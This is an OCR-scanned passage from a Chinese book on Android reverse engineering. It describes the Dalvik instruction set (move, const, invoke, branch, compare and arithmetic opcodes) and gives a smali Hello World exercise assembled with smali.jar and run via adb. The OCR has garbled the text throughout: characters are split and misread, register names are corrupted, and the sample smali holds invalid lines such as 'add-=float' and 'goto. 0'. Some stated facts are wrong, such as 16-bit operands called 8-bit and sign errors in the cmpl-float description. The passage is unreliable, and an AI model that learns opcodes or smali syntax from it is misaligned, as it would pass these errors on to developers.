Android 4.1 源 码 中 己 经 去 除 。 


3.3.1 ”指令 特点 


Dalvik 指 令 在 调用 格式 上 模仿 了 C 语 言 的 调用 约定 。Dalvik 指 令 的 语 
法 与 助词 从 有 如 下 特点 : 

e 参数 采用 从 目标 (destination) 到 源 (source〉 的 方式 。 

e 根据 字 节 码 的 大 小 与 类 型 不 同 ， 一 些 字 节 码 添加 了 名 称 后 绥 以 
消除 歧义 。 

加 ”32 位 常规 类 型 的 字 节 人 码 未 添加 任何 后 级 。 

加 ”64 位 常规 类 型 的 字 节 人 码 添加 -wide 后 级 。 

四 ”特殊 类 型 的 字 厄 人 码 根据 具体 类 型 添加 后 级 。 它 们 可 以 是 - 


boolean、-byte、-char、-short、-int、-long、-float、-double、-object、- 





string、-class、-Void 之 一 。 
e 根据 字 节 码 的 布局 与 选项 不 同 ， 一 些 字 节 码 添加 了 字 节 人 码 后 绥 
以 消除 歧义 。 这 些 后 绥 通 过 在 字 节 人 码 主 名 称 后 添加 斜 杠 “/" 来 分 隔 开 。 
e 在 指令 集 的 描述 中 ， 宽 度 值 中 每 个 字母 表示 宽度 为 4 位 。 
例如 这 条 指令 : “move-wide/from16 vAA, vBBBB” 
move 为 基础 字 节 码 (base opcode) 。 标 识 这 是 基本 操作 。 
wide 为 名 称 后 缀 (name suffixz) 。 标 识 指令 操作 的 数据 宽度 (64 
位 
from16 为 字 节 人 码 后 缀 (opcode suffix) 。 标 识 源 为 一 个 16 位 的 寄存 








器 引用 变量 。 

VAA 为 目的 寄存 器 。 它 始终 在 源 的 前 面 ， 取 值 范围 为 v0 一 V255。 

vBBBB 为 源 寄存 器 。 取 值 范 围 为 v0 一 v65535。 

Dalvik 指 令 集中 大 多 数 指 令 用 到 了 寄存 器 作为 目的 操作 数 或 源 操作 
数 ， 其 中 A/B/C/DVE/E/G/H 代 表 一 个 4 位 的 数值 ， 可 用 来 表示 0 一 15 的 数 
值 或 v0 一 v15 的 寄存 器 ， 而 AA/BB/CC/DD/EE/FF/GG/HH 代 表 一 个 8 位 的 
数值 ， 可 用 来 表示 0 一 255 的 数值 或 v0 一 v255 的 寄存 器 ， 
AAAA/BBBB/CCCC/DDDD/EEEE/FFFF/GGGG/HHHH 代 表 一 个 8 位 的 数 
值 ， 可 用 来 表示 0~~65535 的 数值 或 v0 一 v65535 的 寄存 器 。 
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Android 官 方 指令 文档 描述 寄存 器 时 ， 对 不 同 取 值 范围 的 寄存 器 以 括号 说 明 其 大 小 ， 如 A: 
destination register (4 bits)、A: destination register (16 bits)。 本 章 后 续 小 节 在 描述 指令 时 ， 会 采用 
4 位 、8 位 或 16 位 等 方式 加 以 说 明 。 请 读者 注意 :Dalvijk 虚 拟 机 中 的 每 个 寄存 器 都 是 32 位 的 。 描 
述 指令 时 所 说 的 位 数 表示 的 是 寄存 器 数值 的 取 值 范围 。 






























































3.3.2 ”至 操作 指令 


空 操作 指令 的 助 记 符 为 nop。 它 的 值 为 00， 通 常 hop 指 令 被 用 来 作对 
齐 代码 之 用 ， 无 实际 操作 。 


3.3.3 ”数据 操作 指令 


数据 操作 指令 为 move。move 指 令 的 原型 为 move destination，source 
或 move destination，move 指 令 根 据 字 节 码 的 大 小 与 类 型 不 同 ， 后 面 会 跟 
上 不 同 的 后 级 。 


“move VA，VvB” 将 vB 寄存 器 的 值 风 给 vA 寄 存 器 ， 源 寄存 器 与 目的 寄 
存 器 都 为 4 位 。 

“move/from16 vAA， vBBBB” 将 vBBBB 寄 存 器 的 值 赋 给 vAA 寄 存 
器 ， 源 寄存 器 为 16 位 ， 目 的 寄存 器 为 8 位 。 

“move/16 vAAAA，vBBBB” 将 VBBBB 寄 存 器 的 值 赋 给 vAAAA 寄 存 
器 ， 源 寄存 器 与 目的 寄存 器 都 为 16 位 。 

“move-wide vA, vB” 为 4 位 的 寄存 器 对 赋值 。 源 寄存 器 与 目的 寄存 器 
都 为 4 位 。 

“move-wide/from16 vAA, vBBBB”S“move-wide/16 vAAAA, 
vBBBB” 实 现 与 move-wide 相 同 。 

“move-object vA， vB” 为 对 象 赋值 。 源 天 存 器 与 目的 寄存 器 都 为 4 


“move-object/from16 vAA，vBBBB” 为 对 象 赋值 。 源 寄存 器 为 8 位 ， 
目的 寄存 堪 为 16 位 。 

“move-object/16 vAAAA，vBBBB” 为 对 象 赋 值 。 源 寄存 器 与 目的 寄 
存 器 都 为 16 位 。 

“move-result vAA” 将 上 一 个 invoke 类 型 指令 操作 的 单字 非 对 象 结果 
赋 给 vVAA 寄 存 器 。 

“move-result-wide vAA” 将 上 一 个 invoke 类 型 指令 操作 的 双 字 非 对 象 
结果 赋 给 vAA 寄 存 器 。 

“move-result-object vAA” 将 上 一 个 invoke 类 型 指令 操作 的 对 象 结果 
赋 给 vVAA 寄 存 器 。 

“move-exception ”vAA” 保 存 一 个 运行 时 发 生 的 异常 到 vAA 军 存 右 。 
这 条 指令 必须 是 异常 发 生 时 的 异常 处 理 器 的 一 条 指令 。 否 则 的 话 ， 指 令 
无 





3.3.4 返回 指令 








返回 指令 指 的 是 函数 结尾 时 运行 的 最 后 一 条 指令 。 它 的 基础 学 市 码 
为 return， 共 有 以 下 四 条 返回 指令 

“return-void” 表 示 函 数 从 一 1 人 i 

“returnn ”vAA” 表 示 函 数 返 回 一 个 32 位 非 对 象 类 型 的 值 ， 返 回 值 寄存 
器 为 8 位 的 寄存 器 VAA。 

“Teturn-wide vAA” 表 示 疯 数 返 回 一 个 64 位 非 对 象 类 型 的 值 。 返 回 值 
为 8 位 的 寄存 器 对 vVAA。 

“return-object vAA” 表 示 函 数 返 回 一 个 对 象 类 型 的 值 。 返 回 值 为 8 位 
的 寄存 器 VAA。 


3.3.5 ”数据 定义 指令 


数据 定义 指令 用 来 定义 程序 中 用 到 的 常量 、 字 符 串 、 类 等 数据 。 它 
的 基础 字 节 码 为 const。 

“const/4 VA, #+B” 将 数值 符号 扩展 为 32 位 后 赋 给 寄存 器 vA。 

“const/16 vAA， #BBBB” 将 数值 符号 扩展 为 32 位 后 赋 给 寄存 器 
VAA。 

“constVAA, #+BBBBBBBB” 将 数值 赋 给 寄存 器 vAA。 

“const/high16 vAA，#+BBBB0000” 将 数值 右边 零 扩 展 为 32 位 后 赋 给 
寄存 器 VAA。 

“const-wide/16 vAA, #+BBBB” 将 数值 符号 扩展 为 64 位 后 赋 给 寄存 器 
对 vAA。 

“const-wide/32 vAA, #+BBBBBBBB” 将 数值 符号 扩展 为 64 位 后 赋 给 
寄存 器 对 vAA。 

“const-wide vAA, #+BBBBBBBBBBBBBBBB” 将 数值 赋 给 寄存 器 对 
VAA。 

“const-wide/high16 vAA, #+BBBB000000000000” 将 数值 右边 零 扩 展 





为 64 位 后 赋 给 寄存 器 对 vAA。 
“const-string VAA, string@BBBB” 通 过 字符 串 索 引 构 造 一 个 字符 串 并 
赋 给 寄存 器 VAA。 
“const-string/jumbo VAA，string@BBBBBBBB” 通 过 字符 串 索 引 〈 较 
大 ) 构造 一 个 字符 串 A A 
“const-class vAA，type@BBBB” 通 过 类 型 索引 获取 一 个 类 引用 并 赋 
给 寄存 器 VAA。 
“const-class/jumbo vAAAA，type@BBBBBBBB” 通 过 给 定 的 类 型 索 
引 获取 一 个 类 引用 并 赋 给 寄存 器 YAAAA。 这 条 指令 占用 两 个 字 节 ， 值 
为 0x00ff (Android 4.0 中 新 增 的 指令 ) 





3.3.6” 锁 指令 





锁 指 令 多 用 在 多 线程 程序 中 对 同一 对 象 的 操作 。Dalvik 指 令 集 中 有 
两 条 锁 指令 。 

“monitor-enter VAA” 为 指定 的 对 象 获取 锁 。 

“monitor-exit VAA” 释 放 指 定 的 对 象 的 锁 。 





3.3.7 ”实例 操作 指令 


与 实例 相关 的 操作 包括 实例 的 类 型 转换 、 检 查 及 新 建 等 。 

“check-cast VAA, type@BBBB” 将 vVAA 寄 存 右 中 的 对 象 引 用 转换 成 指 
定 的 类 型 ， 如 果 失 败 会 抛 出 ClassCastException 异 常 。 如 果 类 型 B 指 定 的 
是 基本 类 型 ， 对 于 非 基 本 类 型 的 A 来 说 ， 运 行 时 始终 会 失败 。 

“instance-of vVA，VvB，type@CCCC” 判 断 vB 寄 存 器 中 的 对 象 引 用 是 人 否 
可 以 转换 成 指定 的 类 型 ， 如 果 可 以 vA 寄存 器 赋值 为 !， 否 则 vA 寄存 器 赋 
值 为 0。 








‘new-instance VAA, type@BBBB” 构 造 一 个 指定 类 型 对 象 的 新 实例 ， 
并 将 对 象 引 用 赋值 给 vAA 寄 存 器 ， 类 型 符 type 指 定 的 类 型 不 能 是 数组 
2 

“check-casVjumbo vAAAA，type@BBBBBBBB” 指 令 功 能 与 “check- 
cast VAA, type@BBBB” 相 同 ， 只 是 寄存 器 值 与 指令 的 索引 取 值 范围 更 大 

(Android 4.0 中 新 增 的 指令 ) 。 

“instance-of/jjumbo vAAAA，vBBBB，type@CCCCCCCC” 指 令 功 能 
与 “instance-of vA，vB, type@CCCC” 相 同 ， 只 是 寄存 器 值 与 指令 的 索引 
取 值 范围 更 大 (Android 4.0 中 新 增 的 指令 ) 。 

‘new-instance/jumbo vAAAA，type@BBBBBBBB” 指 令 功 能 与 “new- 
instance VAA, type@BBBB” 相 同 ， 只 是 寄存 器 值 与 指令 的 索引 取 值 范 
更 大 (Android 4.0 中 新 增 的 指令 ) 。 


3.3.8 ”数组 操作 指令 


数组 操作 包括 获取 数组 长 度 、 新 建 数组 、 数 组 赋值 、 数 组 元 素 取 值 
与 赋值 等 操作 。 

“array-length vA，vB” 获 取 给 定 vVB 寄 存 器 中 数组 的 长 度 并 将 值 赋 给 
VA 寄存 器 ， 数 组 长 度 指 的 是 数组 的 条 目 个 数 。 

‘new-array vA, VB, type@CCCC” 构 造 指 定 类 型 (type@CCCC) 与 大 
小 (vB) 的 数组 ， 并 将 值 赋 给 vA 寄存 器 。 

“filled-new-array {VvC, vD, VvE, VvF, VG}, type@BBBB” 构 造 指 定 类 型 

(type@BBBB) 与 大 小 (vA) 的 数组 并 填充 数组 内 容 。vA 寄 存 器 是 隐 

含 使 用 的 ， 除 了 指定 数组 的 大 小 外 还 指定 了 参数 的 个 数 ，vC~vG 是 使 
用 到 的 参数 寄存 器 序列 。 

“filled-new-array/range {vCCCC .. VNNNN}, type@BBBB” 指 令 功 能 
与 “filled-new-array{vC, vD, vE, vF, vGj, type@BBBB” 相 同 ， 只 是 参数 寄 








存 器 使 用 range 字 市 码 后 级 指定 了 取 值 范围 ，vC 是 第 一 个 参数 否 存 器 ，N 
=A+C-1。 

“fill-array-data VAA, +BBBBBBBB” 用 指定 的 数据 来 填充 数组 ，vAA 
寄存 器 为 数组 引用 ， 引 用 必须 为 基础 类 型 的 数组 ， 在 指令 后 面 会 紧 跟 一 
个 数据 表 。 

‘new-array/jumbo vAAAA，vBBBB，type@CCCCCCCC” 指 令 功 能 
与 “new-array vA, vB, type@CCCC” 相 同 ， 只 是 寄存 器 值 与 指令 的 索引 取 
值 范围 更 大 (Android 4.0 中 新 增 的 指令 ) 。 

“filled-new-array/jumbo{vCCCC ..vNNNN},type@BBBBBBBB” 指 令 
功能 与 “filled-new-array/range {VvCCCC .. VNNNN}, type@BBBB” 相 同 ， 
只 是 索引 取 值 范围 更 大 (Android 4.0 中 新 增 的 指令 ) 。 

“arrayop VAA, VBB, vCC” 对 vBB 寄 存 器 指定 的 数组 元 素 进 入 取 值 与 
赋值 。vCC 寄 存 器 指定 数组 元 素 索引 ，VvAA 和 寄存 器 用 来 存放 读 取 的 或 需 
要 设置 的 数组 元 素 的 值 。 读 取 元 素 使 用 aget 类 指令 ， 元 素 赋 值 使 用 aput 
类 指令 ， 根 据 数 组 中 存储 的 类 型 指令 后 面 会 紧 跟 不 同 的 指令 后 级 ， 指 令 
列表 有 aget、aget-wide、aget-object、aget-boolean、aget-byte、aget- 
char、aget-short、aput、aput-wide、aput-object、aput-boolean、aput- 


byte、aput-char、aput-short。 
3.3.9 ”异常 指令 


Dalvik 指 令 集 中 有 一 条 指令 用 来 抛 出 异常 。 
“throw VAA” 抛 出 VAA 寄 存 器 中 指定 类 型 的 异常 。 


3.3.10” 跳 转 指 令 


跳 转 指令 用 于 从 当前 地 址 跳 转 到 指定 的 偏 移 处 。Dalvik 指 令 集 中 有 








三 种 跳 转 指令 : 无 条 件 跳 转 〈goto) 、 分 支 跳 转 (switch) 与 条 件 跳 转 
(if) 。 
“goto +AA” 无 条 件 跳 转 到 指定 偏 移 处 ， 偏 移 量 AA 不 能 为 0。 
“goto/16 +AAAA” 无 条 件 跳 转 到 指定 偏 移 处 ， 偏 移 量 AAAA 不 能 大 


“goto/32 +AAAAAAAA” 无 条 件 跳 转 到 指定 偏 移 处 。 

“packed-switch vAA，+BBBBBBBB” 分 支 跳 转 指 令 。vAA 寄 存 器 为 
switch 分 支 中 需要 判断 的 值 ，BBBBBBBB 指 向 一 个 packed-switch- 
payload 格 式 的 偏 移 表 ， 表 中 的 值 是 有 规律 递增 的 。 

“sparse-switch vAA，+BBBBBBBB” 分 支 跳 转 指 令 。vAA 寄 存 器 为 
switch 分 支 中 需要 判断 的 值 ，BBBBBBBB 指 向 一 个 sparse-switch-payload 
格式 的 偏 移 表 ， 表 中 的 值 是 无 规律 的 偏 移 量 。 关 于 分 文 跳 转 指令 类 型 的 
代码 会 在 第 5 章 中 详细 介绍 。 

“if-test VA，vVB，+CCCC? 条 件 跳 转 指令 。 比 较 vA 寄 存 器 与 VB 寄存 器 
的 值 ， 如 果 比 较 结 果 满 足 就 跳 转 到 CCCC 指 定 的 偏 移 处 。 偏 移 量 CCCC 
不 能 为 0。if-test 类 型 的 指令 有 以 下 几 条 : 

e “if-eq” 如 果 vA 等 于 vB 则 跳 转 。Java 语 法 表示 为 “if (vA == VB)” 

e “if-ne” 如 果 vA 不 等 于 vB 则 跳 转 。Java 语 法 表示 为 “if (vA != vB)” 

e “if-lt” 如 果 vA 小 于 vB 则 跳 转 。Java 语 法 表示 为 “if (vA < VB)” 

e “if-ge” 如 果 vA 大 于 等 于 vB 则 跳 转 。Java 语 法 表示 为 “if (vA >= 











e “if-gt” 如 果 vA 大 于 vB 则 跳 转 。Java 语 法 表示 为 “if (vA > VB)” 

e “if-le” 如 果 vA 小 于 等 于 vB 则 跳 转 。Java 语 法 表示 为 “和 f (vA <= 
vB)” 

“if-testz VAA, +BBBB” 条 件 跳 转 指令 。 拿 VAA 和 寄存 器 与 0 比较 ， 如 果 
比较 结果 满足 或 值 为 0O 时 就 跳 转 到 BBBB 指 定 的 偏 移 处 。 偏 移 量 BBBB 不 
能 为 0。if-testz 类 型 的 指令 有 以 下 几 条 : 


e “if-eq” 如 有 果 vAA 为 0 则 跳 转 。Java 语 法 表示 为 “if (IVAA)” 

e “if-ne” 如 有 果 vAA 不 为 0 则 跳 转 。Java 语 法 表示 为 “if (VAA)” 

e “if-lt* 如 果 vAA 小 于 0 则 跳 转 。Java 语 法 表示 为 “if (vAA < 0)” 

e “if-ge” 如 果 vAA 大 于 等 于 0 则 跳 转 。Java 语 法 表示 为 “if (VAA >= 
0)” 

e “if-gt” 如 果 vAA 大 于 0 则 跳 转 。Java 语 法 表示 为 “if (vAA > 0)” 

e “if-le” 如 果 vAA 小 于 每 于 0 则 跳 转 。Java 语 法 表示 为 “if (VAA <= 
0)” 


3.3.11 ”比较 指令 





比较 指令 用 于 对 两 个 寄存 器 的 值 ( 浮 点 型 或 长 整 型 ) 进行 比较 。 它 
的 格式 为 “cmpkind vAA, vBB, vCC”， 其 中 vBB 寄 存 器 与 vYCC 寄 存 器 是 需 
要 比较 的 两 个 寄存 器 或 两 个 寄存 器 对 ， 比 较 的 结果 放 到 vAA 寄 存 器 。 
Dalvik 指 令 集中 共有 5 条 比较 指令 。 

“cmpl-float” 比 较 两 个 单 精 度 浮 点 数 。 如 果 vBB 寄 存 嚣 大 于 vCC 寄 存 
器 ， 则 结果 为 -1， 相 等 则 结果 为 0， 小 于 的 话 结果 为 1。 

“cmpg-float” 比 较 两 个 单 精 度 浮 点 数 。 如 果 vBB 寄 存 嚣 大 于 vCC 寄 存 
器 ， 则 结果 为 1， 相 等 则 结果 为 0， 小 于 的 话 结果 为 -1。 

“cmpl-double” 比 较 两 个 双 精 度 浮 点 数 。 如 果 vBB 寄 存 器 对 大 于 vCC 
寄存 器 对 ， 则 结果 为 -1， 相 等 则 结果 为 0， 小 于 的 话 结果 为 1。 

“cmpg-double” 比 较 两 个 双 精 度 肖 点数。 如 果 vBB 寄 存 器 对 大 于 vCC 
寄存 器 对 ， 则 结果 为 1， 相 等 则 结果 为 0， 小 于 的 话 结 末 为 -1。 

“cmp-long” 比 较 两 个 长 整 型 数 。 如 果 vBB 寄 存 嚣 大 于 vCC 寄 存 占 ， 
则 结果 为 1， 相 等 则 结果 为 0， 小 于 的 话 结果 为 -1。 

















3.3.12 ”字段 操作 指令 


字段 操作 指令 用 来 对 对 象 实 例 的 字段 进入 读 写 操作 。 字 段 的 类 型 可 
以 是 Java 中 有 效 的 数据 类 型 。 对 普通 字段 与 静态 字段 操作 有 两 种 指令 
集 ， 分 别 是 “iinstanceop vA, vB， field@CCCC” 与 “sstaticop vAA, 
fieldODBBBB，”。 

普通 字段 指令 的 指令 前 级 为 1， 如 对 普通 字段 读 操 作 使 用 iget 指 令 ， 
写 操作 使 用 iput 指 令 ， 静态 字段 的 指令 前 级 为 5， 如 对 静态 字段 读 操 作 使 
用 sget 指 令 ， 写 操作 使 用 sput 指 令 。 

根据 访问 的 字段 类 型 不 同 ， 字 有 段 操 作 指令 后 面 会 紧 跟 字段 类 型 的 后 
级 ， 如 iget-byte 指 令 表 示 读 取 实 例 字 段 的 值 类 型 为 字 节 类 型 ，iput-short 
指令 表示 设置 实例 字段 的 值 类 型 为 短 整形 。 两 类 指令 操作 结果 都 是 一 
样 ， 只 是 指令 前 级 与 操作 的 字段 类 型 不 同 。 

普遍 字段 操作 指令 有 : iget、iget-wide、iget-object、iget-boolean、 











iget-byte、iget-char、iget-short、iput、iput-wide、iput-object、iput- 
boolean、iput-byte、iput-char、iput-short。 

静态 字段 操作 指令 有 : sget、sget-wide、sget-object、sget-boolean、 
sget-byte、sget-char、sget-short、sput、sput-wide、sput-object、sput- 
boolean、sput-byte、sput-char、sput-short。 

在 Android 4.0 系 统 中 ，Dalvik 指 令 集 中 增加 了 “iinstanceop/jumbo 
vAAAA, vBBBB, field@CCCCCCCC” 与 “Sstaticop/jumbo vAAAA, 
field@BBBBBBBB” 两 类 指令 ， 它 们 与 上 面 介绍 的 两 类 指令 作用 相同 ， 

只 是 在 指令 中 增加 了 jumbo 字 节 人 码 后 级 ， 且 寄存 器 值 与 指令 的 索引 取 值 
范围 更 大 。 


3.3.13 ”方法 调用 指令 











方法 调用 指令 负责 调用 类 实例 的 方法 。 它 的 基础 指令 为 invoke， 方 
法 调用 指令 有 “invoke-kind {vC, vD, VE， VE， VvG)}, 


meth@BBBB” 与 “invoke-kind/range {vCCCC .. VNNNN}, meth@BBBB” 两 
类 ， 两 类 指令 在 作用 上 并 无 不 同 ， 只 是 后 者 在 设置 参数 寄存 器 时 使 用 了 
range 来 指定 寄存 器 的 范围 。 根 据 方法 类 型 的 不 同 ， 共 有 如 下 五 条 方法 
调用 指令 。 

“invoke-virtual” 或 “invoke-virtualrange” 调 用 实例 的 虚 方 法 。 

“invoke-super” 或 *invoke-superrange” 调 用 实例 的 父 类 方法 。 

“invoke-direct” 或 “invoke-directrange” 调 用 实例 的 直接 方法 。 

“invoke-static” 或 “invoke-static/range” 调 用 实例 的 静态 方法 。 

“invoke-interface” 或 “invoke-interface/range” 调 用 实例 的 接口 方法 。 

在 Android ”4.0 系统 中 ，Dalvik 指 令 集 中 增加 了 “invoke-kind/jumbo 
{VCCCC .. VNNNN}, meth@BBBBBBBB” 这 类 指令 ， 它 与 上 面 介 绍 的 两 
类 指令 作用 相同 ， 只 是 在 指令 中 增加 了 jumbo 字 节 人 码 后 级 ， 且 寄存 器 值 
与 指令 的 索引 取 值 郊 围 更 大 。 

方法 调用 指令 的 返回 值 必 须 使 用 move-result* 指 令 来 获取 。 如 下 面 


已 人 
两 条 指令 : 
invoke-static {}, Landroid/os/Parcel;->obtain()Landroid/os/Parcel; 








move-result-object v0 


3.3.14 ”数据 转换 指令 


数据 转换 指令 用 于 将 一 种 类 型 的 数值 转换 成 男 一 种 类 型 。 它 的 格式 
为 “unop vA，vB”，vVvB 寄 存 器 或 VB 寄存 器 对 存放 需要 转换 的 数据 ， 转 换 
后 的 结果 保存 在 VA 寄存 器 或 vA 寄存 器 对 中 。 

“neg-int” 对 整 型 数 求 补 。 

“not-int” 对 整 型 数 求 反 。 

“neg-long” 对 长 整 型 数 求 补 。 

“not-long” 对 长 整 型 数 求 反 。 

“neg-float" 对 单 精 度 浮 点 型 数 求 补 。 














“neg-double”" 对 双 精 度 浮 点 型 数 求 补 。 
“int-to-long” 将 整 型 数 转换 为 长 整 型 。 

“int-to-float” 将 整 型 数 转换 为 单 精 度 浮 点 型 。 
“int-to-double” 将 整 型 数 转 换 为 双 精 度 浮 点 型 。 
“long-to-int” 将 长 整 型 数 转换 为 整 型 。 
“long-to-float" 将 长 整 型 数 转换 为 单 精 度 浮 点 型 。 
“long-to-double” 将 长 整 型 数 转换 为 双 精 度 浮 点 型 。 
“float-to-int” 将 单 精度 浮 点 型 数 转换 为 整 型 。 
“float-to-long” 将 单 精 度 浮 点 型 数 转换 为 长 整 型 。 
“float-to-double” 将 单 精度 浮 点 型 数 转换 为 双 精 度 浮 点 型 。 
“double-to-int” 将 双 精 度 浮 点 型 数 转换 为 整 型 。 
“double-to-long” 将 双 精 度 浮 点 型 数 转换 为 长 整 型 。 
“double-to-float” 将 双 精 度 浮 点 型 数 转 换 为 单 精 度 浮 点 型 。 
“int-to-byte” 将 整 型 转换 为 字 节 型 。 
“int-to-char” 将 整形 转换 为 字符 串 。 
“int-to-short” 将 整 型 转换 为 短 整 型 。 


3.3.15 ”数据 运算 指令 


数据 运算 指令 包括 算术 运算 指令 与 逻辑 运算 指令 。 算 术 运 算 指 令 主 
要 进行 数值 间 如 加 、 减 、 乘 、 除 、 模 、 移 位 等 运算 ， 还 辑 运 算 指 令 主要 
进行 数值 间 与 、 或 、 非 、 抑 或 等 运算 。 数 据 运算 指令 有 如 下 四 类 《数据 
运算 时 可 能 是 在 寄存 器 或 寄存 器 对 间 进 行 ， 下 面 的 指令 作用 讲解 时 使 用 
霖 存 器 来 描述 )〉: 

“binop VAA, VBB, vCC” 将 VBB 寄 存 器 与 VCC 寄存 器 进行 运算 ， 结 果 
保存 到 vAA 寄 存 器 。 

“binop/2addr vA，vB” 将 VA 寄存 器 与 VB 寄存 器 进 行 运 得 ,结果 保存 








到 vA 寄存 器 。 

“binop/lit16 vA, VB, #+CCCC” 将 vB 寄存 器 与 常量 CCCC 进 行 运算 ， 
结果 保存 到 vA 寄存 器 。 

“binop/lit8 vAA, vBB, #+CC” 将 vVBB 寄 存 器 与 常量 CC 进行 运算 ， 结 
果 保 存 到 vAA 寄 存 器 。 

后 面 3 类 指令 比 第 1 类 指令 分 别 多 出 了 2addr、lit16、lit8 等 指令 后 
绥 。 四 类 指令 中 基础 字 节 人 码 相同 的 指令 执行 的 运算 操作 是 类 似 的 ， 第 1 
类 指令 中 ， 根 据 数据 的 类 型 不 同 会 在 基础 字 节 码 后 面 加 上 数据 类 型 后 
级 ， 如 -int 或 -long 分 别 表 示 操 作 的 数据 类 型 为 整 型 与 长 整 型 。 第 1 类 指令 
可 归 类 如 下 : 

“add-type"VBB 寄 存 器 与 YCC 寄 存 器 值 进行 加 法 运算 〈VBB 十 
YOY 全 

“sub-type”vVBB 寄 存 器 与 VCC 宫 存 器 值 进行 减法 运算 (vBB a 
COEF 

“mul-type”vVBB 寄 存 器 与 VCC 寄 存 右 值 进行 乘法 运算 (vBB X 
人 

“div-type"vVBB 寄 存 器 与 VCC 和 寄存 器 值 进行 除 法 运算 (VBB / 
VEC 

“rem-type”vVBB 寄 存 器 与 VCC 寄 存 器 值 进行 模 运 算 (vBB % vCC) 。 

“and-type”vBB 寄 存 右 与 VCC 寄 存 右 值 进行 与 运算 (vBB AND 
EC 

“or-type”vBB 守 存 器 与 VCC 寄 存 器 值 进行 或 运算 (vBB OR vCC) 。 

“xor-type”vBB 寄 存 器 与 VCC 寄 存 器 值 进行 寞 或 运算 (vBB XOR 
VECY 

“shl-type”VBB 寄 存 器 值 (有 符号 数 ) 左 移 vCC 位 (vBB << vCC) 。 

“shr-type”VBB 寄 存 嚣 值 (有 符号 数 ) 右 移 vCC 位 (vBB >> VCC) 。 

“ushr-type”"VBB 和 寄存器 值 〈 无 符号 数 ) 右 移 vCC 位 〈VBB >> 














VCC) 。 

其 中 基础 字 节 码 后 面 的 -type 可 以 是 -int、-long、-float、-double。 后 
面 3 类 指令 与 之 类 似 ， 此 处 不 再 列 出 。 

至 此 ，Dalvik 虚 拟 机 支持 的 所 有 指令 就 介绍 完了 。 在 Android 4.0 系 
统 以 前 ， 每 个 指令 的 字 节 码 只 占用 一 个 字 节 ， 范 围 是 0x0~-0x0ff。 在 
Android 4.0 系 统 中 ， 又 扩充 了 一 部 分 指令 ， 这 些 指令 被 称 为 扩展 指令 ， 
主要 是 在 指令 助 记 符 后 添加 了 jumbo 后 经， 增加 了 寄存 器 与 常量 的 取 值 

















3.4 ”Dalvik 指 令 集 练习 一 一 写 一 个 Dalvik 版 的 
Hello World 


本 节 主 要 对 前 面 所 学 的 知识 进行 简单 的 回顾 ， 加 深 对 Dalvik 指 令 的 
理解 ， 读 者 在 练习 过 程 中 需要 多 看 多 写 ， 认 真 打 好 Dalvik 汇 编 基 础 ， 为 
后 面 的 分 析 做 准备 。 











3.4.1 编写 smali 文 件 


本 节 采 用 smali 语 法 来 编写 一 段 Dalvik 指 令 集 代码 来 巩固 上 面 所 学 到 
的 知识 。 新 建 一 个 文本 文件 改名 为 HelloWorld.smali， 然 后 写 出 
HelloWorld 类 的 程序 框架 如 下 : 


.Class public LHelloWorld; # 定 义 类 名 
.super Ljava/lang/Object;  # 和 定义 父 类 
.method public static main([Ljava/lang/String;)V  # 声 明 静 态 main() 方 法 


.registers 4 # 程 序 中 使 用 v0、v1、vV2 寄 存 器 与 一 个 参数 寄存 器 
.parameter # 一 个 参数 

.prologue # 代 码 起 始 指令 

return-void # 人 返回 空 


.end method 
这 是 一 段 HelloWorld 的 架构 代码 ， 定 义 了 一 个 可 编译 运行 的 DEX 文 
件 的 最 小 组 成 部 分 。 下 面 在 .prologue 指 令 下 面 编 写 具 体 代码 : 


# 空 指令 

nop 

nop 

nop 

nop 

# 数 据 定义 指令 
Const/16 v0 0x8 
const/4 vl, 0x5 
const/4 v2, 0x3 
# 数 据 操作 指令 
move vil, v2 

# 数 组 操作 指令 
new-array v0O, vO, [I 


array-length vl, v0 


# 实 例 操作 指令 

new-instance vl, Ljava/lang/StringBuilder; 

# 方 法 调用 指令 

invoke-direct {vli}, Ljava/lang/StringBuilder;-><init>()V 
# 跳 转 指 令 


if-nez vO, :cond_0 

goto :goto_0 

:cond_0 

# 数 据 转换 指令 

int-to-float v2, v2 

# 数 据 运算 指令 

add-=float v2, v2, V2 

# 比 较 指令 

cmpl-float vO, v2, v2 

# 字 段 操作 指令 

sget-object vO, Ljava/lang/System;->out:Ljava/io/PrintSstream; 
const-string v1，"Hello World" # 构 造 字 符 串 

# 方 法 调用 指令 

invoke-virtual {v0O, v1}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V 
# 返 回 指令 

goto. 0 

return-void 


代码 中 使 用 中 了 本 市 中 讲 到 的 大 多 数 类 型 的 指令 ， 读 者 可 以 参照 这 
段 代码 自己 进行 添加 或 修改 。 


3.4.2 ”编译 smali 文 件 


编译 smali 文 件 使 用 smali.jar。 打 开 命 令 提 示 符 窗口 ， 执 行 以 下 命令 
进行 编译 。 

java -jar smali.jar -o classes .dex HelloWor1ld.smali 

如 果 没 有 错误 ， 会 在 当前 目录 下 生成 classes.dex 文 件 。 如 果 编 译 提 
示 找 不 到 文件 ， 可 以 将 smali.jar 与 HelloWorld.smali 放 到 同一 目录 后 再 进 
行 编译 。 








3.4.3 ”测试 运行 





启动 Android 运 行 环境 ， 可 以 是 Android 模 拟 器 或 真实 Android 设 备 ， 
在 命令 提示 符 窗 口中 执行 以 下 命令 。 


adb push HelloWorld.zip /data/local/ 
adb shell dalvikvm -cp /data/local/HelloWorld.zip HelloWorld 
如 图 3-7 所 示 ， 如 末 没 有 错误 ， 命 令 执行 后 会 输出 “Hello World” 字 


符 串 。 


co CAEWINDO 可 SYS7sStea32VCd exe 


:woPkspaceNchapter3\3 .4\3 .4.1>adhb push HelloWorldu.zip /data/local/ 
9 KB/s (595 hytes in 0@.030s> 


:workspace\chapter3\3.4\3.4.1Xadb shell dalvikum -cp /data/local/HelloWorld.2i 
p HelloWorld 
Hello World 


: workspace chapter3\3.43.4.1> 








图 3-7 adb shell 下 执行 HelloWorld.zip 


3.5 本章 小 结 


本 章 主要 介绍 了 Android 的 运行 环境 Dalvik 虚 拟 机 ， 并 对 比 了 Dalvik 
虚拟 机 与 Java 虚 拟 机 的 差异 ， 随 后 介绍 了 Dalvik 的 指令 系统 。Dalvik 指 
令 是 DEX 文 件 最 主要 的 组 成 部 分 ， 读 者 必须 熟练 掌握 这 一 部 分 的 内 容 。 
另外 ， 整 个 Dalvik 指 令 集 的 数目 不 是 很 多 ， 语 法 上 面 也 比较 好 理解 ， 读 
者 可 通过 手动 编号 Dalvik 汇 编 代 码 来 熟悉 所 有 的 指令 ， 为 第 5 章 的 静态 
分 析 打 好 基础 。 


第 4 章 Android 可 执行 文件 


